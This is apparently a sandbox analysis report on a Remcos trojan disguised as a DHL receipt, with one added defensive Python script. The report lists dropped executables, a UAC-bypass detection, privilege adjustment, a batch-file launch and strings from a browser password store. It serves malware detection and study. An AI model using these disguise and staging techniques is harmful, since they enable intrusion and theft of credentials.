Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B5240
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689BD250
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B9E50
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B7650
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B2220
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B4A30
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689DAA30
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689BE680
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689DEE88
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689DAFBC
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B3410
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B6BE0
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B9B50
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B372C
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B3F90
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B5B70
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C18D4
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B8510
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689BB0D8
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C7854
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689DAC4C
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B2C48
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B1884
Source: C:\Users\Public\xkn.exe | Code function: 16_2_00007FFD9BAD10FA
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF316054
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF311664
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF31596C
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF317C7C
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF319890
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF3167A0
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF314050
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF317670
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF312D70
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF319C74
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF314318
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF315128
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF3172C0
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF316EC8
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF3183D8
Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF316AE8
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0044B040
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0043610D
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00447310
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0044A490
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0040755A
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0043C560
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0044B610
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0044D6C0
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_004476F0
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0044B870
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0044081D
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00414957
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_004079EE
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00407AEB
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0044AA80
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00412AA9
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00404B74
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00404B03
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0044BBD8
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00404BE5
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00404C76
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00415CFE
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00416D72
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00446D30
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00446D8B
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00406E8F
Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\yfkwifxL.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: String function: 2DA42093 appears 50 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: String function: 028B7CC8 appears 49 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: String function: 028A480C appears 865 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: String function: 028A6650 appears 37 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: String function: 2DA41E65 appears 35 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: String function: 028B7E14 appears 45 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: String function: 028A46A4 appears 242 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: String function: 2DA74E10 appears 54 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: String function: 2DA74770 appears 41 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: String function: 028A44AC appears 69 times
Source: C:\Users\Public\alpha.exe | Code function: String function: 00007FF7689C3448 appears 54 times
Source: C:\ProgramData\Remcos\remcos.exe | Code function: String function: 028E6650 appears 37 times
Source: C:\ProgramData\Remcos\remcos.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\ProgramData\Remcos\remcos.exe | Code function: String function: 2D5D4E10 appears 54 times
Source: C:\ProgramData\Remcos\remcos.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\ProgramData\Remcos\remcos.exe | Code function: String function: 004165FF appears 35 times
Source: C:\ProgramData\Remcos\remcos.exe | Code function: String function: 028E46A4 appears 152 times
Source: C:\ProgramData\Remcos\remcos.exe | Code function: String function: 028E480C appears 606 times
Source: C:\ProgramData\Remcos\remcos.exe | Code function: String function: 028F7CC8 appears 43 times
Source: C:\ProgramData\Remcos\remcos.exe | Code function: String function: 00416760 appears 69 times
Source: C:\Users\Public\ger.exe | Code function: String function: 00007FF6DF31D3D0 appears 56 times
Source: DHL119040 receipt document,pdf.exe | Binary or memory string: OriginalFilename vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1801950205.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1734723673.0000000002326000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1764092562.000000002C470000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
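The entries above compare the OriginalFilename field of VERSIONINFO resources found in memory with the name of the file on disk: the submitted sample has LOADER.EXE, easinvoker.exe and Truesight in its memory, none of which matches DHL119040 receipt document,pdf.exe, which is consistent with a loader that carries other executables inside it. The Python below is an added example, not code from the report; it scans a raw dump for OriginalFilename String entries and lists the values that do not match the on-disk name. The dump is constructed inline from hand-built VS_VERSIONINFO String structures (plus one bare key without a header) so the script runs offline, and the sanity limit on the header's value length is the example's own choice.

```python
"""Added example (not from the report): list VERSIONINFO OriginalFilename
values found in a memory dump and report those that do not match the name
of the file the process was started from."""
import struct
from typing import List

# szKey of the VS_VERSIONINFO String entry, UTF-16LE with its terminator.
KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"


def _read_utf16z(buf: bytes, off: int) -> str:
    """Read a NUL-terminated UTF-16LE string starting at `off`."""
    end = off
    while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end].decode("utf-16-le", errors="replace")


def original_filenames(dump: bytes) -> List[str]:
    """Every OriginalFilename value in `dump`, in order of appearance.

    A String entry is: WORD wLength, WORD wValueLength, WORD wType, szKey,
    padding to a DWORD boundary, Value. The header is used when it looks
    sane (text type, plausible length); otherwise the key is treated as a
    bare string and the value is read up to its terminator, which is also
    why a plain string scan prints key and value run together.
    """
    names = []
    pos = dump.find(KEY)
    while pos != -1:
        val = pos + len(KEY)
        if dump[val:val + 2] == b"\x00\x00":      # alignment padding before Value
            val += 2
        vlen = 0
        if pos >= 6:
            _, vlen, wtype = struct.unpack_from("<HHH", dump, pos - 6)
            if wtype != 1 or not 0 < vlen <= 260:  # 260 (MAX_PATH) as a sanity bound
                vlen = 0
        if vlen:                                   # wValueLength counts UTF-16 units incl. NUL
            name = dump[val:val + 2 * (vlen - 1)].decode("utf-16-le", errors="replace")
        else:
            name = _read_utf16z(dump, val)
        if name:
            names.append(name)
        pos = dump.find(KEY, pos + 2)
    return names


def mismatches(dump: bytes, on_disk_name: str) -> List[str]:
    """OriginalFilename values that differ from the on-disk name (case-insensitive)."""
    return [n for n in original_filenames(dump) if n.lower() != on_disk_name.lower()]


def _vs_string(key: str, value: str) -> bytes:
    """Build one VS_VERSIONINFO String entry; used only to construct test data."""
    k = key.encode("utf-16-le") + b"\x00\x00"
    v = value.encode("utf-16-le") + b"\x00\x00"
    body = k + b"\x00" * (-(6 + len(k)) % 4) + v   # pad Value to a DWORD boundary
    return struct.pack("<HHH", 6 + len(body), len(value) + 1, 1) + body


# Constructed dump: three proper String entries plus one bare key without a
# header, mirroring the values the report found in the sample's memory.
SAMPLE_DUMP = (
    b"\x00" * 16
    + _vs_string("FileDescription", "DHL receipt")
    + _vs_string("OriginalFilename", "LOADER.EXE")
    + b"\xcc" * 8
    + _vs_string("OriginalFilename", "easinvoker.exe")
    + b"\xcc" * 8
    + KEY + "Truesight".encode("utf-16-le") + b"\x00\x00"
    + b"\xcc" * 8
    + _vs_string("OriginalFilename", "DHL119040 receipt document,pdf.exe")
)

if __name__ == "__main__":
    for name in mismatches(SAMPLE_DUMP, "DHL119040 receipt document,pdf.exe"):
        print("OriginalFilename", name, "vs DHL119040 receipt document,pdf.exe")
```

On a real dump, a mismatch is only a lead, not a verdict: a legitimately renamed installer or a packed but benign binary produces the same signal, so confirm it against the unpacked PE (the Yara matches on the unpacked region further down do exactly that here).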
Source: DHL119040 receipt document,pdf.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000002C.00000002.2045539948.000000003357B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000029.00000002.1972241496.0000000033A1B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@69/31@6/5
              Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,7_2_00007FF7689B32B0
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA57952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_2DA57952
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5B7952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_2D5B7952
              Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF6DF313F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,19_2_00007FF6DF313F5C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028A7F6A GetDiskFreeSpaceA,0_2_028A7F6A
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA4F8FD CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,0_2_2DA4F8FD
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028B6D60 CoCreateInstance,0_2_028B6D60
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA5B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_2DA5B4A8
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA5AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_2DA5AC78
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | File created: C:\Users\Public\Libraries\PNO
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
              Source: C:\Users\Public\xkn.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
              Source: C:\ProgramData\Remcos\remcos.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
              Source: C:\Users\Public\Libraries\yfkwifxL.pif | File created: C:\Users\user\AppData\Local\Temp\971D.tmp
              Source: C:\Users\Public\Libraries\yfkwifxL.pif | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\ProgramData\Remcos\remcos.exe | System information queried: HandleInformation
              Source: C:\Windows\System32\extrac32.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
              Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 00000015.00000002.1816729060.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: remcos.exe, 00000014.00000002.1859873627.000000000270A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: DHL119040 receipt document,pdf.exe | Virustotal: Detection: 18%
              Source: DHL119040 receipt document,pdf.exe | String found in binary or memory: -StartForward
              Source: DHL119040 receipt document,pdf.exe | String found in binary or memory: -address family not supported
              Source: remcos.exe | String found in binary or memory: _-address family not supported
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | File read: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe
              Source: unknown | Process created: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe "C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe"
